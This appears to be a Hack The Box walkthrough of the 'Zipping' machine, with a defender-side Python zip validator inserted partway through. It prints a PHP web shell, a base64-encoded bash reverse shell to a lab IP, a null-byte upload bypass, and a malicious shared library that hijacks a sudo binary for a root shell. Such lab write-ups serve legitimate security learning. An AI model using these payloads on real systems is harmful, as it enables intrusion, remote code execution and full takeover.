Hack the Box: Zipping Walkthrough

Al Azhar Rizqi
7 min read, Sep 4, 2023

First of all, this is the first medium-level machine on Hack The Box that I’ve completed, and it’s also the first article I’ve written. So I’ve decided to share my walkthrough of how I exploited this box and gained user and root access. Without further ado, let’s dive in.

Recon

nmap

When I ran nmap, there were two open TCP ports: 22 (SSH) and 80 (HTTP).

I also added the target hostname to /etc/hosts.

Site

It is a watch store website called “Zipping.” There are several pages that display all products, product details, a cart, and a curriculum file upload.

Exploit

I assumed there were several possible attack vectors, such as the product id parameter and the file upload. First, I tested the id parameter with SQLmap, but it found nothing. However, the part that piqued my interest was the file upload page.

According to the description on the file upload page, the website accepts zip files, and each zip file must contain a PDF file.

Overview of symlinks

A symlink (also called a symbolic link) is a type of file in Linux that points to another file or a folder on your computer. Symlinks are similar to shortcuts in Windows. References: zip symlink vulnerability

I tried a symlink attack to achieve arbitrary file read. References: how zip symlink works

I uploaded the zip file to the website, but nothing appeared when I opened the result in the browser.

Then I tried curl, and it worked.

According to the /etc/passwd file, the username is “rektsu.” I also obtained the source code. However, after experimenting, I found that I could only read files but couldn’t write or execute them. This part was challenging for me.

Then I created a PHP web shell script and set up the listener as shown below.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

I tried the file upload methodology outlined by HackTricks, attempting to bypass the file extension checks to achieve Remote Code Execution (RCE), but in the end none of them worked.

When I intercepted the zip upload, among the binary data there were two copies of the PDF file name, as shown below. (The zip format stores each member’s name twice: once in the local file header and once in the central directory.)

Then I played around with them until I could bypass the file upload restrictions. The key was to change the “A” (0x41) in webshell.phpA.pdf to a null byte (0x00) in the second copy of the file name, then forward the request.

When I opened the file in the browser, it was still a 404 Not Found.

Then I deleted everything after “.php” in that copy, and it worked. The web shell appeared.
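
As an added defender-side example (my code, not from the original walkthrough or the box), here is a Python check an upload handler could run on a zip before anything extracts it. It covers both tricks used above: a symlink entry carrying a .pdf name, and a member name that contains a NUL byte or differs between the zip’s two copies of each name (the local file header and the central directory). The sample archives are constructed inline; a real handler would also check the PDF content itself.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
S_IFMT, S_IFLNK = 0o170000, 0o120000   # Unix file-type bits of external_attr

def local_header_name(data: bytes, offset: int) -> bytes:
    """Raw name in the local file header at `offset` (the copy unzip extracts by)."""
    if data[offset:offset + 4] != LOCAL_SIG:
        raise ValueError("bad local file header signature")
    name_len, = struct.unpack_from("<H", data, offset + 26)
    return data[offset + 30:offset + 30 + name_len]

def zip_upload_problems(data: bytes) -> list:
    """Reasons to reject the archive before extraction; an empty list means clean."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            raw = info.orig_filename   # info.filename is silently cut at the first NUL
            enc = "utf-8" if info.flag_bits & 0x800 else "cp437"
            if "\x00" in raw:
                problems.append(f"NUL byte in name {raw!r}")
            if not raw.lower().endswith(".pdf"):
                problems.append(f"not a .pdf: {raw!r}")
            if (info.external_attr >> 16) & S_IFMT == S_IFLNK:
                problems.append(f"symlink member {raw!r}")
            if local_header_name(data, info.header_offset) != raw.encode(enc):
                problems.append(f"local/central name mismatch for {raw!r}")
    return problems

def build_zip(members) -> bytes:
    """Constructed sample archive: members = [(name, payload, unix mode), ...]."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload, mode in members:
            zi = zipfile.ZipInfo(name)
            zi.external_attr = mode << 16   # 0o120xxx marks a symlink entry
            zf.writestr(zi, payload)
    return buf.getvalue()

def demo() -> dict:
    """Run the check over four constructed uploads; returns name -> problems."""
    clean = build_zip([("cv.pdf", b"%PDF-1.4 constructed", 0o100644)])
    link = build_zip([("cv.pdf", b"/etc/passwd", 0o120777)])  # payload = link target
    nul = build_zip([("cv.phpA.pdf", b"x", 0o100644)]).replace(b"cv.phpA", b"cv.php\x00")
    mism = build_zip([("cv.phpA.pdf", b"x", 0o100644)]).replace(b"cv.phpA", b"cv.phpB", 1)
    return {k: zip_upload_problems(v) for k, v in
            [("clean", clean), ("symlink", link), ("nul", nul), ("mismatch", mism)]}
```

The `nul` sample patches both copies of the name, so only the NUL check fires; the `mism` sample patches only the local header copy, which is what the central-directory-only view of most zip libraries never sees.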

I tried to input a reverse shell payload to obtain a shell, but it didn’t work.

Then I crafted the payload as shown below.

➜ zharsuke@box  ~  echo "/bin/bash -i >& /dev/tcp/10.10.14.92/2424 0>&1 " | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkyLzI0MjQgMD4mMSAK
➜ zharsuke@box ~ echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkyLzI0MjQgMD4mMSAK | base64 -d | bash
  • First, I base64-encoded the command.
  • Then I echoed the base64 text, decoded it, and piped it into bash.

And I got the shell.

Read the user flag:

rektsu@zipping:/home/rektsu$ cat user.txt
cat user.txt
e1b53***************************

Logging in over SSH with id_rsa

I prefer logging in with SSH instead of upgrading my reverse shell because I don’t like the reverse shell interface with just white fonts.

Generate id_rsa on the local box.

➜ zharsuke@box  ~/.ssh  ssh-keygen -t rsa 

Create a web server on the local box with Python, as shown below.

Meanwhile, on the target machine, download id_rsa.pub with wget.

Add id_rsa.pub to authorized_keys.

Then I could log in over SSH.

Privilege Escalation

As usual, I used LinPEAS to look for possible attack vectors.

Overview of LinPEAS

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts.

In the sudo -l section, there is a binary that rektsu can run with sudo.

I tried to run the binary, but unfortunately it asked me for a password.

Then I tried cat on the stock binary and found the password in it. The password is St0ckM4nager.

When I ran the binary, there were three menu options.

After playing around with them, I tried reverse engineering the stock binary to see what the running program does. After copying it to my local box, I used GDB with GEF for the reversing.

Overview of GDB GEF

GEF (pronounced ʤɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands, or bringing out the relevant information from the debugging runtime.

Set a breakpoint at the main function.

Run, then use ni to step to the next instruction.

After a while, I found something interesting: the program loads a shared library named libcounter.so from the /rektsu/.config directory.

But when I checked, there was nothing in the .config directory.

After some googling I found a way to exploit this. Since the binary runs as root via sudo and loads that library from a directory rektsu can write to, the idea is to create a file named libcounter.so containing code that spawns a root shell.

exploit.c

#include <stdlib.h>
#include <unistd.h>

/* _init runs when the shared object is loaded, i.e. inside the sudo'd stock
   process, so everything here already executes as root. */
void _init() {
    setuid(0);               /* make the real uid root too, not just effective */
    setgid(0);
    system("/bin/bash -i");  /* interactive root shell */
}

After that, I compiled the source into libcounter.so, copied it to the .config directory, ran “stock” with sudo, entered the password, and gained root access!

Read the root flag:

root@zipping:~# cat root.txt
fb12****************************

Overall, I learned a lot of things from this box, and I am grateful. It took me one week to complete this box, but it made me even more excited to learn.

“Practice doesn’t make perfect, perfect practice makes perfect.”
